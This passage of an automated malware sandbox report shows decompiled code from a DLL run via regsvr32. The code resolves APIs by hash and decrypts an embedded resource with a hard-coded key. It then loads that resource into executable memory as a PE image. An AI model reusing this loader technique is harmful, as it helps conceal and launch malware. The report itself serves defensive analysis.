                                                                        						_push(_t121);
                                                                        						 *0x1004d3e0 = _t44;
                                                                        						_t45 = E10001FF0();
                                                                        						_push(0x298c691d);
                                                                        						_push(_t121);
                                                                        						 *0x1004d3d0 = _t45;
                                                                        						_t46 = E10001FF0();
                                                                        						_push(0x40ec656b);
                                                                        						_push(_t121);
                                                                        						 *0x1004d3e4 = _t46;
                                                                        						_t47 = E10001FF0();
                                                                        						_push(0x40946966);
                                                                        						_push(_t121);
                                                                        						 *0x1004d3fc = _t47;
                                                                        						_t48 = E10001FF0();
                                                                        						_push(0x5496c247);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3a8 = _t48;
                                                                        						_t49 = E10001FF0();
                                                                        						_push(0x3b465a8a);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3ac = _t49;
                                                                        						_t50 = E10001FF0();
                                                                        						_push(0x66afc09d);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3b8 = _t50;
                                                                        						_t51 = E10001FF0();
                                                                        						_push(0x5eb2ba6);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3d4 = _t51;
                                                                        						_t52 = E10001FF0();
                                                                        						_push(0x3c6bbc0e);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3cc = _t52;
                                                                        						_t53 = E10001FF0();
                                                                        						_push(0x3f32f2a5);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3c8 = _t53;
                                                                        						_t54 = E10001FF0();
                                                                        						_push(0x112ecd9a);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3d8 = _t54;
                                                                        						_t55 = E10001FF0();
                                                                        						_push(0xcfb09550);
                                                                        						_push(_t127);
                                                                        						 *0x1004d400 = _t55;
                                                                        						_t56 = E10001FF0();
                                                                        						_push(0x30fe1b19);
                                                                        						_push(_t40);
                                                                        						 *0x1004d3bc = _t56;
                                                                        						_t57 = E10001FF0();
                                                                        						_push(0x33a92211);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3b4 = _t57;
                                                                        						_t58 = E10001FF0();
                                                                        						_push(0xaab3e2a9);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3f8 = _t58;
                                                                        						_t59 = E10001FF0();
                                                                        						_push(0x31e84135);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3f4 = _t59;
                                                                        						_t60 = E10001FF0();
                                                                        						_push(0xaef34aa1);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3dc = _t60;
                                                                        						_t61 = E10001FF0();
                                                                        						_push(0x1e75927d);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3b0 = _t61;
                                                                        						_t62 = E10001FF0();
                                                                        						_push(0x56331b6e);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3e8 = _t62;
                                                                        						_t63 = E10001FF0();
                                                                        						_push(0x1cf8ffb);
                                                                        						_push(_t127);
                                                                        						 *0x1004d3c4 = _t63;
                                                                        						_t64 = E10001FF0();
                                                                        						_t128 = _a4;
                                                                        						 *0x1004d3c0 = _t64; // executed
                                                                        						_t65 = FindResourceW(_t128, 0x5f4c, 0x1003ce4c); // executed
                                                                        						_t123 = _t65;
                                                                        						_v4 = LoadResource(_t128, _t123);
                                                                        						_t124 = SizeofResource(_t128, _t123);
                                                                        						_t182 =  *0x1004d3b8; // 0x76d866e0
                                                                        						if(_t182 == 0) {
                                                                        							_t96 =  *0x1004b0e8; // 0x0
                                                                        							_t113 =  *0x1004b0e0; // 0x0
                                                                        							_t68 =  *0x1004b0d8; // 0x0
                                                                        							_t129 =  *0x1004b0dc; // 0x0
                                                                        							_t149 =  *0x1004b0ec; // 0x0
                                                                        							_t69 =  *0x1004b0e4; // 0x0
                                                                        							_t15 = _t113 * 2; // 0x3
                                                                        							_t152 = _t149 * _t68 + ((_t96 * _t113 + _t68) * 0x3fffffff + _t129) * _t96 + _t113 + _t129;
                                                                        							_a8 = _t152;
                                                                        							_t110 = (_t129 + _t15 + 3) * _t69 << 2;
                                                                        							_t20 = _t96 + 2; // 0x2
                                                                        							_t157 =  *0x1004b0d8; // 0x0
                                                                        							_t117 = _t69 - _t20 * _t129 - _t113 * _t157 + (_t69 - _t20 * _t129 - _t113 * _t157) * 0x00000002 + (_t69 * _t96 * _t157 + _t69 * _t96 * _t157 * 0x00000002 - 0x00000003) *  *0x1004b0ec + 0x00002000 | 0x00001000 + _a8 * 0x00000004 - _t110;
                                                                        							__eflags = _t117;
                                                                        							_t77 = VirtualAlloc(0, _t124, _t117, 0x40 + _t152 * 4 - _t110);
                                                                        						} else {
                                                                        							_t112 =  *0x1004b0e8; // 0x0
                                                                        							_t119 =  *0x1004b0dc; // 0x0
                                                                        							_t85 =  *0x1004b0ec; // 0x0
                                                                        							_t99 =  *0x1004b0d8; // 0x0
                                                                        							_t4 = _t99 + 0x3fffffff; // 0x3fffffff
                                                                        							_t138 =  *0x1004b0e0; // 0x0
                                                                        							_t8 = _t138 * 2; // 0x3
                                                                        							_t100 =  *0x1004b0e0; // 0x0
                                                                        							_t77 =  *0x1004d3b8(0xffffffff, 0, _t124, 0x00001000 + (_t85 * _t99 + ((_t112 * _t138 + _t99) * 0x3fffffff + _t119) * _t112 - (_t119 + _t8 + 0x00000003) *  *0x1004b0e4 + _t100 + _t119) * 0x00000004 | _t85 *  *0x1004b0e4 * _t112 * _t112 * _t112 * _t112 * _t112 + _t119 + _t85 *  *0x1004b0e4 * _t112 * _t112 * _t112 * _t112 * _t112 + _t119 + 0x00002000, 0x40 + (_t112 * 0x3fffffff + _t4 * _t119 + _t85 + _t138) * 4, 0); // executed
                                                                        						}
                                                                        						_t133 = _t77;
                                                                        						memcpy(_t133, _v4, _t124);
                                                                        						_t79 = malloc(0x9d1);
                                                                        						_t97 = _t79;
                                                                        						E10002340();
                                                                        						E100027D0();
                                                                        						 *0x1004d3e0(_t97, 0x39fc4527, 0xfc9810f7, 0x2aab42ff, _t97, _t133, _t124, 0xed9e0cf, 0x96c3a441, 0x245e78a3, _t97, "8nGA7ohfFpugG(l$!#2u__*t5EaFD77", 0x20);
                                                                        						_t83 = E10005260();
                                                                        						 *0x1004d408 = _t83;
                                                                        						 *0x1004d404(_a4, 1, 0, _t133, _t124, E100045D0, E100045F0, E10004610, E10004650, E10004670, 0);
                                                                        						goto L6;
                                                                        					}
                                                                        				}
                                                                        			}
                                                                        0x100062a4
                                                                        0x100062a9
                                                                        0x100062ae
                                                                        0x100062af
                                                                        0x100062b4
                                                                        0x100062b9
                                                                        0x100062be
                                                                        0x100062bf
                                                                        0x100062c4
                                                                        0x100062c9
                                                                        0x100062ce
                                                                        0x100062cf
                                                                        0x100062d4
                                                                        0x100062dc
                                                                        0x100062e1
                                                                        0x100062e2
                                                                        0x100062e7
                                                                        0x100062ec
                                                                        0x100062f1
                                                                        0x100062f2
                                                                        0x100062f7
                                                                        0x100062fc
                                                                        0x10006301
                                                                        0x10006302
                                                                        0x10006307
                                                                        0x1000630c
                                                                        0x10006311
                                                                        0x10006312
                                                                        0x10006317
                                                                        0x1000631c
                                                                        0x10006321
                                                                        0x10006322
                                                                        0x10006327
                                                                        0x1000632e
                                                                        0x10006333
                                                                        0x10006334
                                                                        0x1000633a
                                                                        0x1000633f
                                                                        0x10006344
                                                                        0x10006345
                                                                        0x1000634a
                                                                        0x1000634f
                                                                        0x10006361
                                                                        0x10006366
                                                                        0x10006368
                                                                        0x10006374
                                                                        0x1000637e
                                                                        0x10006380
                                                                        0x10006386
                                                                        0x10006432
                                                                        0x10006438
                                                                        0x1000643e
                                                                        0x10006443
                                                                        0x10006449
                                                                        0x10006459
                                                                        0x1000646d
                                                                        0x10006474
                                                                        0x10006476
                                                                        0x10006481
                                                                        0x10006487
                                                                        0x10006494
                                                                        0x100064c4
                                                                        0x100064c4
                                                                        0x100064ca
                                                                        0x1000638c
                                                                        0x1000638c
                                                                        0x10006392
                                                                        0x10006398
                                                                        0x1000639e
                                                                        0x100063a4
                                                                        0x100063b9
                                                                        0x100063d6
                                                                        0x100063fa
                                                                        0x10006427
                                                                        0x10006427
                                                                        0x100064d5
                                                                        0x100064d9
                                                                        0x100064e4
                                                                        0x100064f1
                                                                        0x10006503
                                                                        0x1000651a
                                                                        0x10006523
                                                                        0x10006546
                                                                        0x10006557
                                                                        0x1000655c
                                                                        0x00000000
                                                                        0x10006565
                                                                        0x10006133

                                                                        APIs
                                                                        • FindResourceW.KERNELBASE(?,00005F4C,1003CE4C), ref: 10006366
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 1000636C
                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 10006378
                                                                        • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,00000000), ref: 10006427
                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,?,00000000), ref: 100064CA
                                                                        • memcpy.MSVCRT ref: 100064D9
                                                                        • malloc.MSVCRT ref: 100064E4
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 10006523
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$AllocVirtual$??3@FindLoadNumaSizeofmallocmemcpy
                                                                        • String ID: 8nGA7ohfFpugG(l$!#2u__*t5EaFD77$kernel32.dll$msvcrt.dll$ntdll.dll
                                                                        • API String ID: 3024364686-882265788
                                                                        • Opcode ID: 73f28b8c6d58252cdff927fcb48cb9a981f06cd2f682e57dd75e91a0e94e53b4
                                                                        • Instruction ID: 1699d20feb2015e992388abaa39e01a506b89f8495deb80be789641e5ebed42c
                                                                        • Opcode Fuzzy Hash: 73f28b8c6d58252cdff927fcb48cb9a981f06cd2f682e57dd75e91a0e94e53b4
                                                                        • Instruction Fuzzy Hash: ACA159719403256FF704EF748EC6E96769CEB46681B00453FF511E726AEBB0B5008B9D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        Graph of function 10005260 (legend: Executed, Not Executed). API calls shown in the graph: GetNativeSystemInfo, GetProcessHeap, HeapAlloc, memcpy.
                                                                        C-Code - Quality: 73%
                                                                        			E10005260() {
                                                                        				signed int _t340;
                                                                        				signed int _t351;
                                                                        				signed int _t354;
                                                                        				signed int _t356;
                                                                        				signed int _t360;
                                                                        				void* _t373;
                                                                        				signed int _t385;
                                                                        				signed int _t388;
                                                                        				signed int _t398;
                                                                        				signed int _t403;
                                                                        				intOrPtr _t405;
                                                                        				void* _t410;
                                                                        				signed int _t411;
                                                                        				signed int _t412;
                                                                        				signed int _t413;
                                                                        				signed int _t423;
                                                                        				signed int _t425;
                                                                        				void* _t433;
                                                                        				signed int _t436;
                                                                        				signed int _t437;
                                                                        				signed int _t438;
                                                                        				void* _t441;
                                                                        				signed int _t442;
                                                                        				signed int _t444;
                                                                        				signed int _t448;
                                                                        				intOrPtr _t453;
                                                                        				signed int _t454;
                                                                        				signed int _t463;
                                                                        				void* _t467;
                                                                        				signed int _t468;
                                                                        				signed int _t469;
                                                                        				void* _t473;
                                                                        				signed int _t474;
                                                                        				void* _t475;
                                                                        				void* _t476;
                                                                        				intOrPtr _t478;
                                                                        				signed int _t481;
                                                                        				void* _t492;
                                                                        				signed int _t498;
                                                                        				signed int _t520;
                                                                        				intOrPtr _t523;
                                                                        				signed int _t532;
                                                                        				signed int _t533;
                                                                        				signed short* _t542;
                                                                        				signed int _t545;
                                                                        				signed int _t563;
                                                                        				signed int _t571;
                                                                        				signed int _t579;
                                                                        				signed int _t580;
                                                                        				signed int _t583;
                                                                        				intOrPtr _t585;
                                                                        				signed int _t587;
                                                                        				signed int _t590;
                                                                        				signed int _t604;
                                                                        				signed int _t624;
                                                                        				intOrPtr _t636;
                                                                        				signed int _t637;
                                                                        				signed int _t642;
                                                                        				signed int _t665;
                                                                        				signed int _t668;
                                                                        				signed int _t673;
                                                                        				signed int _t691;
                                                                        				signed int _t692;
                                                                        				signed int _t706;
                                                                        				signed int _t707;
                                                                        				signed int _t716;
                                                                        				signed int _t717;
                                                                        				signed int _t722;
                                                                        				signed int _t726;
                                                                        				signed int _t731;
                                                                        				signed int _t732;
                                                                        				signed int _t733;
                                                                        				signed int _t736;
                                                                        				signed int _t738;
                                                                        				signed int _t739;
                                                                        				signed int _t743;
                                                                        				signed int _t752;
                                                                        				signed int _t754;
                                                                        				signed int _t756;
                                                                        				signed int _t759;
                                                                        				signed int _t761;
                                                                        				signed int _t765;
                                                                        				signed int _t766;
                                                                        				signed int _t770;
                                                                        				signed int _t778;
                                                                        				signed int _t780;
                                                                        				signed int _t789;
                                                                        				signed int _t795;
                                                                        				signed int _t836;
                                                                        				signed int _t840;
                                                                        				signed int _t841;
                                                                        				signed int _t853;
                                                                        				signed int _t867;
                                                                        				signed int _t888;
                                                                        				signed int _t890;
                                                                        				signed int _t891;
                                                                        				signed int _t895;
                                                                        				signed int _t900;
                                                                        				signed int _t903;
                                                                        				signed int _t905;
                                                                        				signed int _t907;
                                                                        				signed int _t913;
                                                                        				signed int _t918;
                                                                        				signed int _t921;
                                                                        				signed int _t924;
                                                                        				signed int _t928;
                                                                        				signed int _t930;
                                                                        				signed int _t932;
                                                                        				signed int _t933;
                                                                        				signed int _t934;
                                                                        				signed int _t941;
                                                                        				intOrPtr* _t951;
                                                                        				signed int _t954;
                                                                        				signed int _t955;
                                                                        				signed int _t956;
                                                                        				signed int _t962;
                                                                        				signed int _t963;
                                                                        				signed int _t970;
                                                                        				signed int _t971;
                                                                        				signed int _t981;
                                                                        				signed int _t988;
                                                                        				signed int _t989;
                                                                        				signed int _t995;
                                                                        				signed int _t1035;
                                                                        				signed int _t1041;
                                                                        				signed int _t1042;
                                                                        				signed int _t1043;
                                                                        				signed short _t1049;
                                                                        				signed int _t1050;
                                                                        				signed int _t1051;
                                                                        				signed int _t1064;
                                                                        				intOrPtr* _t1066;
                                                                        				signed int _t1067;
                                                                        				signed int _t1075;
                                                                        				signed int _t1076;
                                                                        				signed int _t1084;
                                                                        				signed int _t1085;
                                                                        				signed int _t1086;
                                                                        				signed int _t1091;
                                                                        				signed int _t1094;
                                                                        				signed int _t1097;
                                                                        				signed int _t1126;
                                                                        				signed int _t1128;
                                                                        				signed int _t1132;
                                                                        				signed int _t1135;
                                                                        				signed int _t1138;
                                                                        				signed int _t1153;
                                                                        				signed int _t1165;
                                                                        				signed int _t1166;
                                                                        				signed int _t1167;
                                                                        				intOrPtr* _t1168;
                                                                        				signed int _t1169;
                                                                        				signed int _t1170;
                                                                        				signed int _t1174;
                                                                        				signed int _t1184;
                                                                        				signed int _t1187;
                                                                        				signed int _t1200;
                                                                        				void* _t1202;
                                                                        				signed int _t1227;
                                                                        				signed int _t1237;
                                                                        				void* _t1248;
                                                                        				void* _t1249;
                                                                        				void* _t1250;
                                                                        				void* _t1251;
                                                                        
                                                                        				_t691 =  *0x1004b0ec; // 0x0
                                                                        				_t340 =  *0x1004b0e4; // 0x0
                                                                        				_t981 =  *0x1004b0e0; // 0x0
                                                                        				_t932 =  *0x1004b0d8; // 0x0
                                                                        				_t795 =  *0x1004b0dc; // 0x0
                                                                        				_t933 =  *0x1004b0e8; // 0x0
                                                                        				_t4 = _t981 * _t933 + 2; // 0x2
                                                                        				_t5 = _t795 + 0x3fffffff; // 0x3fffffff
                                                                        				_t6 = _t691 + 0x3fffffff; // 0x3fffffff
                                                                        				_t934 =  *0x1004b0e0; // 0x0
                                                                        				_t532 =  *0x1004b0d8; // 0x0
                                                                        				 *(_t1248 + 0x14) = 0;
                                                                        				if( *((intOrPtr*)(_t1248 + 0x60)) + ((_t691 * 0x3fffffff + _t6 * _t340 + _t933 << 1) - (_t934 * _t532 * _t795 + 1) * _t795 + _t532) * 2 < 0x40 + (_t5 * _t340 + (_t340 + _t4) * _t981 + _t933 + (_t981 * 0x3fffffff - (_t691 * _t932 + 1) * _t340 + _t795 + 2) * _t932 + _t691 + _t795) * 4) {
                                                                        					L32:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t988 =  *0x1004b0e0; // 0x0
                                                                        					_t533 = _t532 * _t795;
                                                                        					_t941 =  *0x1004b0e8; // 0x0
                                                                        					_t989 = _t988 * _t691;
                                                                        					 *(_t1248 + 0x10) = _t533;
                                                                        					 *(_t1248 + 0x30) = _t989;
                                                                        					_t542 =  *(_t1248 + 0x5c);
                                                                        					if(( *_t542 & 0x0000ffff) != (_t533 - _t941 + _t941 * 2 - _t340 - _t691 << 1) - (_t691 + _t691 + (_t989 * _t691 + _t795) * _t795 * 2) *  *0x1004b0e0 + 0x5a4d) {
                                                                        						goto L32;
                                                                        					} else {
                                                                        						_t995 = _t941 * _t691;
                                                                        						 *(_t1248 + 0x20) = _t542[0x1e];
                                                                        						 *(_t1248 + 0x2c) = _t995;
                                                                        						_t545 =  *0x1004b0d8; // 0x0
                                                                        						_t26 = (((_t995 +  *(_t1248 + 0x10)) * _t795 + _t941) * _t340 + _t941 * _t545) * 2; // 0x7
                                                                        						_t1126 =  *0x1004b0e0; // 0x0
                                                                        						_t36 = _t691 + 1; // 0x1
                                                                        						if( *((intOrPtr*)(_t1248 + 0x60)) + (_t36 * _t340 + (((_t941 * _t941 * _t941 + _t795 * _t795) * 0x3fffffff + _t1126) * _t795 + 1) * _t941 +  *(_t1248 + 0x10) + _t691) * 4 <  *(_t1248 + 0x20) + (((_t995 +  *(_t1248 + 0x10)) * _t795 + _t941) * _t340 + _t941 * _t545 + _t26 + 7) *  *0x1004b0e0 + _t691 * 0x55555551 + _t545 + (_t691 * 0x55555551 + _t545) * 2 + (_t340 * 4 - 5) * _t795 + _t941 * 7 - _t340 + 0xf8) {
                                                                        							goto L32;
                                                                        						} else {
                                                                        							_t1128 =  *0x1004b0e8; // 0x0
                                                                        							_t951 = (_t795 - _t691 + 1) * _t795 + (_t795 - _t691 + 1) * _t795 * 4 - (_t691 + _t691 * 4 + 5) * _t1128 - _t691 + _t691 * 4 + ( *(_t1248 + 0x5c))[0x1e] +  *(_t1248 + 0x5c);
                                                                        							_t47 = _t340 + 0x7fffffff; // 0x7fffffff
                                                                        							 *(_t1248 + 0x18) = _t340 + _t340;
                                                                        							_t52 = _t691 * 0x7ffffffb + _t47 * _t795 + _t1128 + (3 - _t795) *  *0x1004b0e0 + 0x4550; // 0x4550
                                                                        							_t1132 =  *0x1004b0e8; // 0x0
                                                                        							_t563 =  *0x1004b0d8; // 0x0
                                                                        							 *((intOrPtr*)(_t1248 + 0x24)) = _t951;
                                                                        							if( *_t951 != _t691 * 0x7ffffffb + _t47 * _t795 + _t1128 + (3 - _t795) *  *0x1004b0e0 + _t52 - ( *(_t1248 + 0x18) + 2 + _t1132 * 2) * _t563) {
                                                                        								goto L32;
                                                                        							} else {
                                                                        								_t1135 =  *0x1004b0e0; // 0x0
                                                                        								_t1138 =  *0x1004b0e0; // 0x0
                                                                        								if(( *(_t951 + 4) & 0x0000ffff) != ((_t691 + _t563) *  *0x1004b0e8 - _t795 + 2) * _t795 - (_t1135 + 2) * _t340 -  *0x1004b0e8 - _t691 + _t1138 + 0x14c + (((_t691 + _t563) *  *0x1004b0e8 - _t795 + 2) * _t795 - (_t1135 + 2) * _t340 -  *0x1004b0e8 - _t691 + _t1138) * 2) {
                                                                        									goto L32;
                                                                        								} else {
                                                                        									 *(_t1248 + 0x1c) =  *(_t951 + 0x38);
                                                                        									_t1035 =  *0x1004b0e0; // 0x0
                                                                        									 *(_t1248 + 0x20) = _t563 + _t563 * 2;
                                                                        									if(( *(_t1248 + 0x1c) &  *(_t1248 + 0x20) + _t1035 * _t1035 * _t1035 * _t795 + _t691 + _t691 + 0x00000001 + ( *(_t1248 + 0x20) + _t1035 * _t1035 * _t1035 * _t795 + _t691 + _t691) * 0x00000002) != 0) {
                                                                        										goto L32;
                                                                        									} else {
                                                                        										_t1041 =  *0x1004b0e0; // 0x0
                                                                        										_t1042 =  *0x1004b0e8; // 0x0
                                                                        										_t1043 =  *0x1004b0e8; // 0x0
                                                                        										_t571 =  *0x1004b0d8; // 0x0
                                                                        										_t1153 =  *0x1004b0e0; // 0x0
                                                                        										 *(_t1248 + 0x20) = ((_t563 * _t563 + _t1041) * _t563 + (_t563 - _t340 - _t691) * _t795 + (2 - _t1042 -  *0x1004b0d8) * _t1043 + (_t571 + _t795) * 2 - _t340 + _t691) * 0x78 + _t951 + ( *(_t951 + 0x14) & 0x0000ffff) + 0x18;
                                                                        										_t579 =  *(_t1248 + 0x18);
                                                                        										_t83 = _t795 - 2; // -2
                                                                        										_t1049 = (_t795 + _t83 - _t579) * _t340 + ((_t1153 * _t795 + 1) * _t691 + 0x7fffffff) * _t1043 * 2 + ( *(_t951 + 6) & 0x0000ffff) - _t691 + _t691;
                                                                        										if(_t1049 == 0) {
                                                                        											_t580 =  *0x1004b0d8; // 0x0
                                                                        											_t1050 =  *0x1004b0e8; // 0x0
                                                                        										} else {
                                                                        											 *((intOrPtr*)(_t1248 + 0x28)) =  ~_t579 - _t691 * 4;
                                                                        											 *(_t1248 + 0x10) =  *(_t1248 + 0x20) + 0xc;
                                                                        											_t673 =  *0x1004b0d8; // 0x0
                                                                        											 *(_t1248 + 0x20) = _t1049;
                                                                        											_t1086 =  *0x1004b0e8; // 0x0
                                                                        											do {
                                                                        												_t1237 =  *( *(_t1248 + 0x10) + 4);
                                                                        												 *(_t1248 + 0x18) = _t1237;
                                                                        												if(_t1237 != 0) {
                                                                        													_t951 =  *((intOrPtr*)(_t1248 + 0x24));
                                                                        													_t1091 = (4 + _t340 * 4) * _t673 + (_t1086 * 8 - 0xc) * _t795 +  *(_t1248 + 0x18) + (_t691 + _t691 * 2 + (_t691 + _t1086 * 2 + _t673 + 1) *  *0x1004b0e0 + _t1086) * 4 +  *( *(_t1248 + 0x10));
                                                                        												} else {
                                                                        													_t97 = _t795 + 0x7ffffffe; // 0x7ffffffe
                                                                        													_t1094 =  *0x1004b0e0; // 0x0
                                                                        													_t1091 =  *(_t1248 + 0x1c) + (((_t340 + _t691) * _t1086 + _t691) * 0x7fffffff + _t97 * _t795 + _t1094 * 2) * 2 +  *( *(_t1248 + 0x10));
                                                                        												}
                                                                        												 *(_t1248 + 0x18) = _t1091;
                                                                        												if(_t1091 <=  *((intOrPtr*)(_t1248 + 0x28)) +  *(_t1248 + 0x14)) {
                                                                        													_t673 =  *0x1004b0d8; // 0x0
                                                                        												} else {
                                                                        													_t1097 =  *0x1004b0e0; // 0x0
                                                                        													_t673 =  *0x1004b0d8; // 0x0
                                                                        													 *(_t1248 + 0x14) =  *(_t1248 + 0x18) + ((_t340 + _t795) * 0x3fffffff + ((_t340 *  *0x1004b0d8 + 1) * 0x3fffffff + _t1097) *  *0x1004b0e8 + _t1097 + _t691 + _t673) * 4;
                                                                        												}
                                                                        												_t1086 =  *0x1004b0e8; // 0x0
                                                                        												 *(_t1248 + 0x10) =  *(_t1248 + 0x10) + 0x28;
                                                                        												_t129 = _t1248 + 0x20;
                                                                        												 *_t129 =  *(_t1248 + 0x20) - 1;
                                                                        											} while ( *_t129 != 0);
                                                                        										}
                                                                        										_t133 =  *(_t1248 + 0x2c) * _t580 + 2; // 0x2
                                                                        										 *0x1004d3bc(_t1248 + 0x34 + ((_t340 - _t691 - 4) * _t795 - (_t340 + _t133) * _t1050 + ( *(_t1248 + 0x30) + _t580 + 2) *  *0x1004b0e0 - _t691) * 0x6c);
                                                                        										_t351 =  *0x1004b0e4; // 0x0
                                                                        										_t692 =  *0x1004b0ec; // 0x0
                                                                        										_t1165 =  *0x1004b0e8; // 0x0
                                                                        										_t1051 =  *0x1004b0dc; // 0x0
                                                                        										_t583 =  *0x1004b0e0; // 0x0
                                                                        										 *(_t1248 + 0x34) = E10002BF0((2 - _t351 * _t351) * _t583 - _t692 + _t692 - _t1165 + _t1051 +  *((intOrPtr*)(_t1248 + 0x38)), (1 - _t1165) * _t351 * _t1051 +  *((intOrPtr*)(_t951 + 0x50)));
                                                                        										_t354 =  *0x1004b0d8; // 0x0
                                                                        										_t142 = _t354 + 0x7ffffffe; // 0x7ffffffe
                                                                        										_t143 = _t354 + 2; // 0x2
                                                                        										_t356 =  *0x1004b0e4; // 0x0
                                                                        										_t360 =  *0x1004b0ec; // 0x0
                                                                        										_t146 = _t1051 + 0xa; // 0xa
                                                                        										_t706 =  *0x1004b0d8; // 0x0
                                                                        										 *(_t1248 + 0x1c) =  *(_t1248 + 0x34) + (_t356 * 0x7fffffff + _t142 * _t1165 + _t1051 + _t1051 + _t143 * _t583 << 1) - (_t1051 + _t146) * _t360;
                                                                        										_t707 = _t706 * _t1051;
                                                                        										 *(_t1248 + 0x14) = _t707;
                                                                        										_t1166 =  *0x1004b0ec; // 0x0
                                                                        										 *(_t1248 + 0x34) = (_t707 * 0xfffffffd - (_t1165 * _t1165 + 3 + _t1165 * _t1165 * 2) * _t583 + 3) * _t583;
                                                                        										_t1167 =  *0x1004b0d8; // 0x0
                                                                        										_t373 = E10002BF0( *((intOrPtr*)(_t1248 + 0x3c)) + _t360, ( *(_t1248 + 0x14) + 1) * _t1051 - _t1165 + _t1166 + _t1166 + _t1167 + (( *(_t1248 + 0x14) + 1) * _t1051 - _t1165 + _t1166 + _t1166 + _t1167) * 2 +  *(_t1248 + 0x34) +  *(_t1248 + 0x18));
                                                                        										_t1249 = _t1248 + 8;
                                                                        										if( *(_t1248 + 0x20) != _t373) {
                                                                        											goto L32;
                                                                        										} else {
                                                                        											_t716 =  *0x1004b0ec; // 0x0
                                                                        											 *(_t1249 + 0x20) = _t716 * _t1167;
                                                                        											_t165 = _t1051 + 2; // 0x3
                                                                        											_t717 =  *0x1004b0e8; // 0x0
                                                                        											_t166 = _t1167 + 1; // 0x1
                                                                        											_t385 =  *0x1004b0e4; // 0x0
                                                                        											_t388 =  *0x1004b0ec; // 0x0
                                                                        											_t398 =  *0x1004b0e4; // 0x0
                                                                        											_t403 =  *0x1004b0ec; // 0x0
                                                                        											_t722 =  *0x1004b0e8; // 0x0
                                                                        											_t182 = _t403 + 1; // 0x1
                                                                        											_t1168 =  *((intOrPtr*)(_t1249 + 0x74));
                                                                        											_t405 =  *_t1168((( ~_t1051 << 1) - ( *((intOrPtr*)(_t1249 + 0x30)) + 2) *  *0x1004b0e4 + _t583 << 2) - (_t403 + _t403 + _t403 * 2 + _t182 * _t722 * _t722 * 4) * _t1167 +  *((intOrPtr*)(_t951 + 0x34)),  *(_t1249 + 0x20), ((_t388 * _t388 * _t1167 + _t388 * _t388 * _t1167 * 0x00000002 - _t1051 + _t1051 * 0x00000002) * _t583 - _t1051 + _t1051 * 0x00000002) * _t1051 + (_t583 * _t1167 + _t583 * _t1167 * 0x00000002 - 0x00000003) * _t717 -  *(_t1249 + 0x28) +  *(_t1249 + 0x28) * 0x00000002 + 0x00001000 | (_t398 + 0x7fffffff) * _t1051 + _t583 * 0x7fffffff + (_t398 + 0x7fffffff) * _t1051 + _t583 * 0x7fffffff + 0x00002000, ((1 - _t583) * _t1167 + _t165) * _t716 + (_t583 *  *0x1004b0e4 + 3) * _t717 + _t166 * _t583 + _t385 * _t1167 * 0x7fffffff + ((1 - _t583) * _t1167 + _t165) * _t716 + (_t583 *  *0x1004b0e4 + 3) * _t717 + _t166 * _t583 + _t385 * _t1167 * 0x7fffffff + 4,  *((intOrPtr*)(_t1249 + 0x78)));
                                                                        											_t1250 = _t1249 + 0x14;
                                                                        											_t585 = _t405;
                                                                        											 *((intOrPtr*)(_t1250 + 0x10)) = _t585;
                                                                        											if(_t585 != 0) {
                                                                        												L21:
                                                                        												_t836 =  *0x1004b0e8; // 0x0
                                                                        												_t726 =  *0x1004b0ec; // 0x0
                                                                        												_t213 = (_t836 -  *0x1004b0dc + 1) * _t836 + _t726 + 0x40; // 0x41
                                                                        												_t840 =  *0x1004b0d8; // 0x0
                                                                        												_t1064 =  *0x1004b0e4; // 0x0
                                                                        												_t841 =  *0x1004b0e8; // 0x0
                                                                        												_t410 = HeapAlloc(GetProcessHeap(), 8 + ((_t841 + 1) *  *0x1004b0dc + (_t726 * 0x3fffffff + _t840) *  *0x1004b0e0 + _t726 * 0x3fffffff + _t1064) * 4, (1 - _t726) *  *0x1004b0e0 + _t213);
                                                                        												_t731 =  *0x1004b0e8; // 0x0
                                                                        												_t411 =  *0x1004b0e0; // 0x0
                                                                        												_t412 =  *0x1004b0ec; // 0x0
                                                                        												_t1066 = _t410 + (_t731 - _t411 - _t412 +  *0x1004b0dc << 6);
                                                                        												if(_t1066 != 0) {
                                                                        													 *((intOrPtr*)(_t1066 + 4)) = _t585;
                                                                        													_t413 =  *0x1004b0e0; // 0x0
                                                                        													_t732 =  *0x1004b0ec; // 0x0
                                                                        													_t224 = _t732 * 2; // -268738780
                                                                        													_t853 =  *0x1004b0e8; // 0x0
                                                                        													_t733 =  *0x1004b0d8; // 0x0
                                                                        													 *((intOrPtr*)(_t1066 + 0x20)) =  *((intOrPtr*)(_t1250 + 0x68));
                                                                        													asm("sbb eax, eax");
                                                                        													 *((intOrPtr*)(_t1066 + 0x2c)) =  *((intOrPtr*)(_t1250 + 0x74));
